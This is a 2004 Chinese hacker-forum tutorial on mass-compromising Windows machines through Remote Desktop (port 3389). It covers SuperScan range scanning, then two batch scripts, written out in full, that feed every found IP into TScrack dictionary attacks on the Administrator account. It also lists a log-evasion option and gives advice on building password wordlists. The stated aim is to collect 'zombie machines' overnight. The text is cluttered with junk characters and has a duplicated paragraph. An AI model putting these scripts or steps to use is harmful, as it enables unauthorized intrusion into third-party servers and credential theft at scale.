|
作者:霜风 QQ:14226581
! v0 n2 F) Y2 j; w8 `! V# Q$ S2 \终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。. k. s) l8 N7 ?* H8 `/ j
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 0 B- j1 E- e2 I* y( L
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:
# a l2 V$ ?% s$ ]- T先打开superscan3如图1
. b0 c4 @6 I: v) h8 ~+ D
- C* f' r* T3 [此主题相关图片如下:
8 S) u# w. j5 _* v0 Y% Q
4 |' D" g$ F4 I8 ]
; Q% ~) X) m! ^4 Y& F1 R. D- s% U( m接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图28 I$ u' y5 F. z; ~
3 v7 Y3 R/ R7 T7 r1 v6 L' p5 W# ^
此主题相关图片如下:
& B8 ?# `1 a0 m) V) @
$ |6 l9 d* \0 \5 Q) C 9 t! m$ ]2 x7 o9 X# m! Y% R
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.8 j$ ~, B. d$ _7 I* w' X( O
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
8 l$ E1 s- u- [6 v! r- D! X& g9 ?3 r* j" x
此主题相关图片如下:, l# R% w7 \( D
" e+ Q1 q8 }- @
[3 p" t( {9 t: G' \
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。, J. d& b9 G1 K. Z `/ i( ~' V* W
9 `' y3 }% O$ B' Z( Y% o' T" e
此主题相关图片如下:: u: m% \0 }! G: A& l( C: f* P
! z4 h: K- r# h" c
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
- @6 v c, S4 R; X) t/ \9 \/ n
[6 r5 m5 ?, @此主题相关图片如下:: i; D( p( d, o: q3 b
2 J) n! m5 o/ M h9 G
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
% \' L: V5 A% z" M所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
0 g( ?# w7 J& w5 S% K4 L5 Y* \' YTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。1 o" p; h/ J8 H @9 u y% Y
此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。: p4 m3 R. v9 L# Q. ~2 O
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
# ?; t3 o" I w8 W5 n-h : Print usage help and exit3 f) V$ M9 X9 v- A3 |/ n# `
-V : Print version info and exit
4 H9 s* ?$ q$ {/ V5 I6 z% R; v-s : Print chipher strenght info and exit
& W. h5 h& @( t4 k+ A* m3 w-b : Enable failed password beep
+ ~# W9 @4 v# k" j1 Z2 J; f-t : Use two simultaneous connections [EXPERIMENTAL]2 f" {) T1 Z& O1 l- p! f
-N : Prevent System Log entries on targeted server( R+ t2 o- P$ c4 m% L/ |! ]5 J
-U : Uninstall tscrack and remove components
' H; o( d( ^+ ~2 ^3 a* S3 Y8 \0 v-f <number> : Wordlist entry to start cracking with
- K# C: q" Y( X Z9 C5 s' {-F <delay> : Sampling Frequency (Delay between samples in ms)
, U1 f/ j9 h7 ?9 B( {6 j-l <user> : Account name to use, defaults to Administrator
5 ~& ~6 g o9 x% \5 j7 \-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
" j( X* i' g* ?4 ^/ U9 T/ G0 v-p <password> : Use <password> to logon instead of wordlist/blank pass2 a4 W9 ^( V9 X; B% L
-D <domain> : Specify domain to attempt logon to l2 @: B _/ N- s5 D
4 F% w) M, c9 n8 f, o5 u
" g$ ?% M. Q$ G: r我就帮忙翻译一下吧,翻译得不好可不要怪我啊:1 L0 O" F% L( g* x$ x" v8 o* |
-h : 显示使用帮助然后退出
6 v9 j% m4 z1 [, C2 w-V : 显示版本信息然后退出
4 _: P1 l! E6 B K% R# y1 [( [; |-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明) H4 v. l& p' A9 ~' I" ]* }, W
-b : 密码错误时发出声音
/ P9 y' U' h# S7 T" }" a$ c8 I-t : 同时发出多个连接,就是多线程。
" L; v2 ~! p6 S' v% s! b* o9 q; n-N : Prevent System Log entries on targeted server- Y" ]* f4 A1 z. v& \
-U : 卸载移除tscrack组件。: d8 e" q, G/ E4 u
-f <number> : 使用-F后面的密码。$ J/ U( p( L% W" c! E
-F <delay> : 间隔时间(频率)' P( ?/ S1 m# o( N2 T& p9 V9 g
-l <user> : 使用-L后面的用户名# D% M& o4 @. `
-w <wordlist> : 使用-W后面的字典8 l0 h' b* L; I) [4 ]& s5 ?# n/ I
-p <password> : 使用-W后的密码
5 k1 n' D$ G; i. B-D <domain> : 登陆主页面?5 L) @9 K3 I. H/ m, _5 g# z
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:" n' H- I, i' B* P- F# O6 w& h1 ]
@if not exist IpcScan.txt goto noscan
4 }( i( o$ \4 M$ z@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
4 @5 F9 v: [" f:noscan
- j* s0 C! G% Y2 N& U@echo 3389.txt no find or scan faild 
7 h; P/ z0 a+ {% B- n这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)2 `0 R( z; X3 _, u) o4 y
保存后把后错名改为BAT就可以了。
+ Q3 @+ v: p, d# Z* D还写一个BAT,名字为HACK.BAT,代码如下:
) k9 S: d" T6 c3 i@if not exist tscrack.exe goto noscan+ W' `% K5 o. [, F7 h" T7 u
@tscrack %1 -l administartor -w pass.dic >>rouji.txt$ O' q4 i. e% Q( L# ^" x1 y; }
:noscan# |% w2 R0 k9 _8 p% G
@echo tscrack.exe no find or scan faild
+ i' x1 o- ^9 U' x这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
5 u* Z# i& [1 f4 S. c: c0 V: {2 s制作方法如上。' s, j$ f2 q0 E/ [1 I
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
. s9 t5 l& @0 I* C8 J3 y5 @' w# J3 r
此主题相关图片如下:; v U2 A( u* l* {, O# t
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. w' z0 D: u0 ^- |, u' j% n
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7" S4 C9 r8 i7 R/ C9 g
1 |) ~+ z- ^' Y! w5 J' X此主题相关图片如下:6 l3 W8 o7 c. A* Z' X! q4 I
0 S: z$ e2 m m! }& Z* @/ ~怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic./ Q/ n5 a9 H1 A; V5 f; O
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
